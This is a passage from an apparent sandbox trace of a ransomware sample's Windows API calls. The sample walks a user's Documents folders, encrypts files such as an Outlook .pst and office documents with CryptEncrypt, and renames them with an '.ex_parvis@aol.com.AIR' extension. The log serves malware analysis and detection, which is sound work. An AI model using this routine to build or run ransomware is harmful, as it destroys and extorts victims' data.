lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.319] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=0) returned 1 [0167.319] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x0 [0167.319] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.319] GetProcessHeap () returned 0x2e0000 [0167.319] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.319] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.319] WriteFile (in: hFile=0x53c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.320] WriteFile (in: hFile=0x53c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.320] WriteFile (in: hFile=0x53c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.320] ReadFile (in: hFile=0x53c, lpBuffer=0x383dc0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383dc0*, lpNumberOfBytesRead=0x2acf9c8*=0x0, lpOverlapped=0x0) returned 1 [0167.321] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.321] WriteFile (in: hFile=0x53c, lpBuffer=0x383dd0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383dd0*, lpNumberOfBytesWritten=0x2acf9c8*=0x0, lpOverlapped=0x0) returned 1 [0167.321] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.321] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.321] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", dwFileAttributes=0x80) returned 1 [0167.322] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 62 [0167.322] GetProcessHeap () returned 0x2e0000 [0167.322] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe2) returned 0x3ac428 [0167.322] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" [0167.322] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0167.322] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.325] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0167.326] GetProcessHeap () returned 0x2e0000 [0167.326] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.326] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=216) returned 1 [0167.326] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd8 [0167.326] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.326] GetProcessHeap () returned 0x2e0000 [0167.326] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.326] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.326] WriteFile (in: hFile=0x53c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.327] WriteFile (in: hFile=0x53c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.327] WriteFile (in: hFile=0x53c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.327] ReadFile (in: hFile=0x53c, lpBuffer=0x31f5f0, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31f5f0*, lpNumberOfBytesRead=0x2acf9c8*=0xd8, lpOverlapped=0x0) returned 1 [0167.327] SetFilePointer (in: hFile=0x53c, lDistanceToMove=-216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.327] WriteFile (in: hFile=0x53c, lpBuffer=0x336dd8*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesWritten=0x2acf9c8*=0xd8, lpOverlapped=0x0) returned 1 [0167.328] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0167.328] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xb149ca50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb149ca50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1828 [0167.328] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.328] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.328] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", dwFileAttributes=0x80) returned 1 [0167.329] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 77 [0167.329] GetProcessHeap () returned 0x2e0000 [0167.329] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363b58 [0167.329] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" [0167.329] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR" [0167.329] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.334] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x540 [0167.334] GetProcessHeap () returned 0x2e0000 [0167.334] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.334] GetFileSizeEx (in: hFile=0x540, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=271360) returned 1 [0167.335] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x42400 [0167.335] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.335] GetProcessHeap () returned 0x2e0000 [0167.335] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.335] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.335] WriteFile (in: hFile=0x540, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.348] WriteFile (in: hFile=0x540, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.348] WriteFile (in: hFile=0x540, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.350] ReadFile (in: hFile=0x540, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x42400, lpOverlapped=0x0) returned 1 [0167.362] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6cde7f0, ftCreationTime.dwHighDateTime=0x1d4cc29, ftLastAccessTime.dwLowDateTime=0xb14c2bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb14c2bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1868 [0167.363] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.363] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.363] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots", dwFileAttributes=0x80) returned 1 [0167.363] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots") returned 67 [0167.363] GetProcessHeap () returned 0x2e0000 [0167.363] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x31fae0 [0167.363] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots" [0167.363] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots.12781717671972518758.ex_parvis@aol.com.AIR" [0167.364] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\q-ivynb5dlnnm-.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\q-ivynb5dlnnm-.ots.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.368] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\Q-IVynB5dlNnm-.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\q-ivynb5dlnnm-.ots.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544 [0167.369] GetProcessHeap () returned 0x2e0000 [0167.369] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.369] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=45390) returned 1 [0167.369] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xb14e [0167.369] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.369] GetProcessHeap () returned 0x2e0000 [0167.369] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.369] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.369] WriteFile (in: hFile=0x544, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.370] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.370] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.370] ReadFile (in: hFile=0x544, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xb14e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xb14e, lpOverlapped=0x0) returned 1 [0167.372] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.372] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.372] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp", dwFileAttributes=0x80) returned 1 [0167.372] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp") returned 63 [0167.372] GetProcessHeap () returned 0x2e0000 [0167.372] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3ac428 [0167.373] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp" [0167.373] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp.12781717671972518758.ex_parvis@aol.com.AIR" [0167.373] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\lcg-qcb3fm.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\lcg-qcb3fm.odp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.375] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\LCg-qCB3fm.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\lcg-qcb3fm.odp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544 [0167.375] GetProcessHeap () returned 0x2e0000 [0167.375] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.375] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=84908) returned 1 [0167.375] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14bac [0167.375] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.375] GetProcessHeap () returned 0x2e0000 [0167.375] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.375] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.375] WriteFile (in: hFile=0x544, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.376] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.376] WriteFile (in: hFile=0x544, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.377] ReadFile (in: hFile=0x544, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x14bac, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x14bac, lpOverlapped=0x0) returned 1 [0167.380] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.380] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.380] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv", dwFileAttributes=0x80) returned 1 [0167.380] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv") returned 72 [0167.380] GetProcessHeap () returned 0x2e0000 [0167.380] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf6) returned 0x31f5f0 [0167.380] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv" [0167.380] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.380] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\c offlfazt6gemgg-0z.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c oFflFazt6Gemgg-0Z.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\c offlfazt6gemgg-0z.csv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.383] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\c 